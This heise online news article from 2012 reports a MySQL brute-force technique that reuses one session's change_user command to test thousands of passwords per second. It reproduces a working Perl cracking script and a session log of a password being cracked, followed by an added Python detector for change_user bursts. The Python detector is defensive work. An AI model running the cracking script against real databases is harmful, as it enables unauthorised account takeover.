In association with heise online

04 December 2012, 15:26

Fast cracking of MySQL passwords demonstrated


A hacker by the name of Kingcope has found another security problem with the popular MySQL database. Using an already well-known characteristic of the database's user management, it is possible to significantly increase the speed of a brute force attack. "Brute-forcing" typically involves trying out a huge number of possible passwords in order to guess the actual password of the user. Each password has to be presented to the login process, which takes time, and when thousands of passwords need to be processed that time becomes substantial.

What Kingcope has found is a trick that allows him to test up to 5000 passwords per second over the network, provided he already has some access to the database. For this, the attacker requires an unprivileged account for the database. The script uses that account to log in and then issues the 'change_user' command to attempt to switch to another account during the MySQL session. Unlike presenting each password to the login process, this works over an already established network connection, and the server rejects incorrect passwords very quickly.

The hacker used the John The Ripper password cracker to create a password list and has documented the attack with a Perl script and a record of a command line session. Cracking a four-character password with remote access to the MySQL database took just 20 seconds, with over 100,000 character combinations tested.

The example script

use strict;
use warnings;
use Net::MySQL;

$| = 1;    # autoflush so each result is printed immediately

# Authenticate once with the unprivileged account; every guess below
# reuses this single established connection.
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => "user",
    password => "secret",
    debug    => 0,
);

my $crackuser = "crackme";    # account whose password is being guessed

# Read one candidate password per line (piped in from John the Ripper).
while (<STDIN>) {
    chomp;
    my $currentpass = $_;

    # Payload for the change_user request: target user name, then the
    # scrambled password preceded by its length byte (0x14 = 20 bytes).
    my $vv = join "\0",
        $crackuser,
        "\x14" .
        Net::MySQL::Password->scramble(
            $currentpass,
            $mysql->{salt},
            $mysql->{client_capabilities}
        ) . "\0";

    # Send the change_user command (0x11) over the existing session; a
    # defined result means the server accepted the password.
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}

The example session

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted
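From the defender's side, the distinctive trace of this technique is a single connection issuing change_user over and over, which is exactly what the session above produces on the server. The following Python is an added example, not part of Kingcope's material or of MySQL, that flags such bursts in general query log entries; it assumes the 5.x general log layout `time<TAB>id Command<TAB>argument` and uses constructed sample lines, since whether failed change_user attempts appear in the log depends on the server version and configuration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the MySQL 5.x general query log layout
# (YYMMDD HH:MM:SS <TAB> connection_id Command <TAB> argument).
# Connection ids, users, hosts and timestamps are made up for this example.
SAMPLE_LOG = """\
121204 15:26:01\t    5 Connect\tuser@192.168.2.3 on test
121204 15:26:01\t    5 Change user\tcrackme@192.168.2.3 on test
121204 15:26:01\t    5 Change user\tcrackme@192.168.2.3 on test
121204 15:26:01\t    5 Change user\tcrackme@192.168.2.3 on test
121204 15:26:02\t    5 Change user\tcrackme@192.168.2.3 on test
121204 15:26:02\t    5 Change user\tcrackme@192.168.2.3 on test
121204 15:26:02\t    5 Change user\tcrackme@192.168.2.3 on test
121204 15:26:03\t    6 Connect\tapp@10.0.0.7 on shop
121204 15:26:03\t    6 Query\tSELECT 1
121204 15:26:10\t    6 Change user\treports@10.0.0.7 on shop
121204 15:26:11\t    6 Quit\t
"""

LINE_RE = re.compile(
    r"^(\d{6} \d{2}:\d{2}:\d{2})\t\s*(\d+) (Connect|Change user|Query|Quit)\t?(.*)$"
)


def parse_general_log(text):
    """Yield (timestamp, connection_id, command, argument) per log entry."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # multi-line query continuations, unknown commands
        ts = datetime.strptime(m.group(1), "%y%m%d %H:%M:%S")
        yield ts, int(m.group(2)), m.group(3), m.group(4)


def find_change_user_bursts(text, threshold=5, window=timedelta(seconds=10)):
    """Return {connection_id: total change_user count} for every connection
    that issued more than `threshold` Change user commands within any
    sliding `window`. Connection pools that re-authenticate on checkout
    also use change_user, so tune `threshold` to the legitimate rate."""
    per_conn = defaultdict(list)
    for ts, cid, cmd, _arg in parse_general_log(text):
        if cmd == "Change user":
            per_conn[cid].append(ts)
    flagged = {}
    for cid, times in per_conn.items():
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1  # drop events that fell out of the window
            if end - start + 1 > threshold:
                flagged[cid] = len(times)
                break
    return flagged
```

On the sample, connection 5 is reported with six change_user commands inside two seconds while connection 6, a normal re-authentication, is not.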

(djwm)
